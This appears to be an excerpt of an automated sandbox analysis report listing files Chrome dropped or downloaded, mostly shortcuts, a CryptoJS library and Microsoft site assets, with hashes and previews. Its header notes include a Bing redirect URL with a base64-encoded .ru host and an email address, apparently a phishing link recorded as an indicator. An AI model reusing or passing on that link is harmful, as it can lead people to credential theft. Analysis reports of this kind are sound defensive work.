                                                                                                                                    • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.206, 64.233.163.84, 2.16.158.34, 2.16.158.169, 2.16.158.96, 2.16.158.184, 2.16.158.97, 2.16.158.186, 2.16.158.192, 2.16.158.179, 2.16.158.35
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                    • VT rate limit hit for: https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:27:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2677
                                                                                                                                    Entropy (8bit):3.9871777365918226
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B8909EBCE914129C893E8E30784C68C4
                                                                                                                                    SHA1:5251BDCBA4042DE29CA61CCAACDD3C6DBDC7C984
                                                                                                                                    SHA-256:DDE02F7C8105A9B9AA2D850FFB47892CA64C2E674252483F7BC3FEACC55F9C6B
                                                                                                                                    SHA-512:6FDBFF0E035CE003EB2DF75D9301602384399599C6AC398FEB0C63CFA1BC48F6FAC62B40713F6B12F6FEECC85FA7EA614FB4DB2827C5C333FC72839234E08CBB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:L..................F.@.. ...$+.,....We.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yi.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Yq.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Yq............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ys............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:27:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2679
                                                                                                                                    Entropy (8bit):4.006730041434199
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:BFCD2CDE70F2EA4554FA4B20BCC3A01F
                                                                                                                                    SHA1:FB0FD860C819E34487E1EFC053857102806E23E2
                                                                                                                                    SHA-256:3705DA4CDA6CD8D97E6FC04C442E9D435E9C3A1A43EC57EC31761ACAF672DA02
                                                                                                                                    SHA-512:32F3AADD0A93B86FE3B99AF025C1D454BE4ACFAE8AF36CDAF8CA80702027DF002B94142986E937535728D49185457520888DC0930267F8743178CB8651E87D37
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:L..................F.@.. ...$+.,........P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yi.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Yq.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Yq............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ys............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2693
                                                                                                                                    Entropy (8bit):4.017319956092094
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:CCF9D8139F3143D7180BC6A646F5FBBA
                                                                                                                                    SHA1:48F3721CD2EB9E51589855166D34E0B1CFE70F73
                                                                                                                                    SHA-256:71D7D8EFB989758E26F49A69E28DA799CF844DD2990DCB7E2F3372D9E085270D
                                                                                                                                    SHA-512:7BF4D896CA7EC6491250949F6680A8A25DF168832B1E86CF802F36436AB66B9D66016F2F1F84CB7466EC39A2CA165AF2C09CB1E8FC974FF0F8C51CE6C14446B8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yi.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Yq.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Yq............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:27:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2681
                                                                                                                                    Entropy (8bit):4.003258676026222
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:51C3A25F5E1A751BE832BF6506795209
                                                                                                                                    SHA1:AD3BD3A6FA2EED0048C07FB1FF257B5DFAA5F9F3
                                                                                                                                    SHA-256:98A79D40D5EEAC64ACA82BF89648370C87D8FF6F74447114D72DE9B44BF4E2E4
                                                                                                                                    SHA-512:90F0156B0204B9FF5B2B62CE05FE535B72826DEB4AF2E974281F91E7911944AD394527BE7FA11F7EEB81407C0D253B5A606FBCAB8E303613AF607955E30868A9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:L..................F.@.. ...$+.,....<...P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yi.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Yq.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Yq............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ys............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:27:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2681
                                                                                                                                    Entropy (8bit):3.9945121592284223
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:E2BD6F83ADDD07EEE860AD0E1F430E12
                                                                                                                                    SHA1:D06CA11CE17BF2D7383FFC9F46A42732D97DBDC3
                                                                                                                                    SHA-256:BE26703D93C9724391B231C984D221972D5E487074CFC4455BBA08F5EE91871A
                                                                                                                                    SHA-512:02A03C639081FC1C60EDE82F003BE5B05495879EDDDFA0E2476975D751CD3F75660B8048433ADE4D077E6188DDFCE53BD3A4FB45FC3C81F1DC8D8A6921B861CD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:L..................F.@.. ...$+.,....^#.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yi.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Yq.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Yq............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ys............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 15:27:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2683
                                                                                                                                    Entropy (8bit):4.003450495395216
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:326F42326D9180511E56C7C68C928016
                                                                                                                                    SHA1:0C178C7ECA81F43CCDD54D6E6DEEA3E7391DC655
                                                                                                                                    SHA-256:5D52A95F350AD8F97027CE109754D006EF7A4C7AA02091C3DA6335E5FDB1D722
                                                                                                                                    SHA-512:40B08FA71F0F7F7BABC8F71FD24FCC0A0F5E27C7E14B09E6C973824BD72C525BA65935BF11CE3C6F122E775AC644254DACC0A13B2FEBC403AFA7C467918B8193
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:L..................F.@.. ...$+.,.....@..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yi.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Yq.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Yq............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ys............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):48316
                                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2436
                                                                                                                                    Entropy (8bit):4.675816652909621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                                                                                    SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                                                                                    SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                                                                                    SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-ajaxutil.min.ACSHASH3473c7d90bd072edee7d20686eb3fd28.js
                                                                                                                                    Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):39
                                                                                                                                    Entropy (8bit):4.2504143220263435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D66C468F4CA17E83CCD97A4518B3E814
                                                                                                                                    SHA1:2E657440F653DA65E699AC9230D82FAEE414D8A5
                                                                                                                                    SHA-256:8E1CE663720F6AFB2DEE29B587D3F7559EA89BC622F966120C9F108172A5C866
                                                                                                                                    SHA-512:FC012A375F871892839D547D3FB3D38B58C2542B0F32FB005A7CADCA7ECD676D1626F3CE79E2DD24890B02162EF7C2B8A877049CE7865B9B83C7FFDA9C40FBBF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-aem-styles.min.ACSHASHd66c468f4ca17e83ccd97a4518b3e814.css
                                                                                                                                    Preview:.xf-content-height{margin:0 !important}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1818)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):185145
                                                                                                                                    Entropy (8bit):5.263515273204495
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:8F54371F05BC32A5CBCF5D92B52B9432
                                                                                                                                    SHA1:E48D06AB8E24219379EB8936C15CCA6DACB68BB3
                                                                                                                                    SHA-256:977046592B00D4B3569B963B568C06C557E58E9BD806D2D68A37E9561E2114C5
                                                                                                                                    SHA-512:D423C6B105B776AC7CB213841EC5B5B97D42A3E13F848A28AC8BBD88847C07ABF44F7D3B8ABEB01E8D32FA5667336C6F4199E715CB33EF32A0CF75DF1F963F68
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://publisher.liveperson.net/iframe-le-tag/iframe-cs.html?lpsite=60270350&lpsection=powerplatform-presales-en-us&buttons=lpPowerPlatform
                                                                                                                                    Preview:<!DOCTYPE html>.<html lang='en'>.<head> ..<title>iFrame Cart Page</title>..<meta charset='utf-8'>..<meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'>..<meta name="format-detection" content="telephone=no"/>....<meta name='viewport' content='width=device-width, height=device-height, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no'/>...<style>.../*Empty MR3*/...body {....background-image:url('https://lpcdn.lpsnmedia.net/le_unified_window/9.12.0.19-release_4769/resources/loader_on_warmGray5_75.gif');....background-repeat: no-repeat;....background-attachment: fixed;....background-position: center;....background-color: #f2f2f2;....margin: 0;...}....@font-face {....font-family: "Segoe UI";....src: url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2") format('woff');...}......* {....font-family: "Segoe UI", Arial, sans-serif !important;...}....body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {....colo
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (541)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3642
                                                                                                                                    Entropy (8bit):5.399452635270733
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                                    SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                                    SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                                    SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-cookiecomp/v1.min.ACSHASHbe3f2a9f6a41fc40556efe260fc861a5.js
                                                                                                                                    Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (34534)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):51730
                                                                                                                                    Entropy (8bit):4.767042349911926
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:C54AE5DBF51FC36F3B9595B50B18E7B7
                                                                                                                                    SHA1:B0708E54A0295F97116C6A5AB9D4B6C065F814E9
                                                                                                                                    SHA-256:1E29CBA858E9B58E11A415E56A4ED9E562A6F91B0EBF98AF3C50AC4C551B4FBB
                                                                                                                                    SHA-512:307A1DE89EFE620487F61CEDC8343D3BF173D6E6B7D78147685A5DFA0EF6BEA7CE620D59ACCB246E9A4DBE366442EDE5C70CBFE4FB565501D2937182BE934C85
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-wc-themes/power-apps.min.ACSHASHc54ae5dbf51fc36f3b9595b50b18e7b7.css
                                                                                                                                    Preview:/*!. * Reimagine WC Theming v11.0.2. * OneCloud Reimagine v0.256.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */:root{--ds-spacing-1:.125rem;--ds-spacing-3xs:.125rem;--ds-spacing-2:.25rem;--ds-spacing-2xs:.25rem;--ds-spacing-3:.5rem;--ds-spacing-xs:.5rem;--ds-spacing-4:.75rem;--ds-spacing-s:.75rem;--ds-spacing-5:.75rem;--ds-spacing-m:.75rem;--ds-spacing-6:1rem;--ds-spacing-l:1rem;--ds-spacing-7:1.5rem;--ds-spacing-xl:1.5rem;--ds-spacing-8:2rem;--ds-spacing-2xl:2rem;--ds-spacing-9:3rem;--ds-spacing-3xl:3rem;--ds-spacing-10:3.5rem;--ds-spacing-4xl:3.5rem;--ds-copy-padding-s:0rem;--ds-copy-padding-m:0rem;--ds-copy-padding-l:0rem;--ds-copy-padding-xl:0rem;--ds-card-padding-default:1rem;--ds-card-padding-comfortable:1.5rem;--ds-card-padding-relaxed:2rem;--ds-breadth-vertical-default:var(--ds-spacing-4xl);--ds-breadth-vertical-relaxed:var(--ds-spacing-4xl);--ds-breadth-vertical-comfortable
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):293
                                                                                                                                    Entropy (8bit):4.99262841309604
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:59873FBD0C6D18034F7CBCB0CE44CDAA
                                                                                                                                    SHA1:0F5CBFB885FE94082A9BE9E5B73F23384A7F7368
                                                                                                                                    SHA-256:B184ABEF90675ABAE98CB7F10796D0B82EC0F01D847A531DA87EACA9FC6E891E
                                                                                                                                    SHA-512:89A5D1CC5B4DE5F113D9FACDDB31ED18F0FA87DB91253A57728D2301246C7F677799C6DED77D297C96ED60D91923B99CA7AE2407A290B0A52D64F749302346C5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M24 6.43359V22.5H7.5V0H17.5664L24 6.43359ZM18 6H21.4336L18 2.56641V6ZM22.5 21V7.5H16.5V1.5H9V21H22.5ZM0 7.5H6V9H0V7.5ZM1.5 10.5H6V12H1.5V10.5ZM3 13.5H6V15H3V13.5Z" fill="#0078D4"/>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (42133)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):138268
                                                                                                                                    Entropy (8bit):5.224497765711851
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                                    SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                                    SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                                    SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
